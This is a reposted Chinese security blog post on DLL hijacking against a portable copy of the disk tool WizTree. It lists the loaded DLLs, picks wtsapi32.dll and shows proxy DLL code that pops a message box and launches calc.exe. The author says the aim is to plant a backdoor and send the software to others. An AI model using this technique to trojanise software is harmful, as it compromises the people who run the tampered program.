一次 DLL 劫持实战

admin 2022年7月14日17:52:50评论117 views字数 1490阅读4分58秒阅读模式


背景

       今天磁盘提示没空间了,找天哥要了一份检查磁盘大文件的工具WizTree 。到手之后发现他把整个安装目录都打包过来,解压后主程序能直接运行。像这种开箱即用的软件想看看有没有可以利用点,比如弹个窗留个后门啥的,到时候发给别人一次 DLL 劫持实战一次 DLL 劫持实战一次 DLL 劫持实战


       目录内容挺简单的,locale文件夹是语言包。两个主程序,分别对应是32位和64位。

一次 DLL 劫持实战



    运行一下,检查加载Dll列表,看看有没有可以利用的。

C:WindowsSystem32wow64log.dllD:APPWizTreempr.dllD:APPWizTreeoleacc.dllD:APPWizTreewinmm.dllD:APPWizTreeversion.dllD:APPWizTreenetapi32.dllD:APPWizTreewinhttp.dllD:APPWizTreeSHFolder.dllD:APPWizTreeNETUTILS.DLLD:APPWizTreeOLEACCRC.DLLC:WindowsSysWOW64rpcss.dllD:APPWizTreewtsapi32.dllD:APPWizTreeWINSTA.dllD:APPWizTreeolepro32.dllD:APPWizTreeURL.DLLD:APPWizTreeIEFRAME.dllD:APPWizTreeiertutil.dllD:APPWizTreeUSERENV.dllD:APPWizTreeWKSCLI.DLLD:APPWizTreePROPSYS.dllD:APPWizTreeprofapi.dllD:APPWizTreeCFGMGR32.dllD:APPWizTreeedputil.dllD:APPWizTreeVAULTCLI.dllD:APPWizTreeurlmon.dllD:APPWizTreesrvcli.dllD:APPWizTreeSspiCli.dll


    发现存在可劫持Dll

wtsapi32.dll


    程序加载路径

D:APPWizTreewtsapi32.dll

    

    主程序启动会加载路径当前路径下 wtsapi32.dll,但是当前目录下没有此Dll文件,根据Dll路径搜索目录顺序我们可以分析,主程序运行时加载wtsapi32.dll就是加载C:WindowsSystem32wtsapi32.dll 

DLL路径搜索目录顺序
1. 进程对应的应用程序所在目录2. 系统目录(即%windir%system32)3. 16位系统目录(即%windir%system)


    制作恶意Dll,生成转发Dll代码(使用大佬工具一键生成)

一次 DLL 劫持实战


    修改代码实现弹窗和打开计算器

// 弹窗MessageBox(NULL, L"恭喜你中招了", L" Dll 劫持", MB_OK);
// 执行exe STARTUPINFO si = { sizeof(si) }; PROCESS_INFORMATION pi; CreateProcess(TEXT("C:\Windows\System32\calc.exe"), NULL, NULL, NULL, false, 0, NULL, NULL, &si, &pi);

    至于实战咋利用大家就各自发挥了,我相信大家骚操作很多,这里我就不献丑了,免得大家笑话。用到的工具Github上有很多,大家可以自行去下载,这里就不放出来了。

    

    文章有点水,但是新鲜,就是今天上午的事。嘿嘿,主要是想提醒大家公众号换头像了一次 DLL 劫持实战一次 DLL 劫持实战一次 DLL 劫持实战

原文始发于微信公众号(backdoor):一次 DLL 劫持实战

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月14日17:52:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一次 DLL 劫持实战https://cn-sec.com/archives/1177379.html

发表评论

匿名网友 填写信息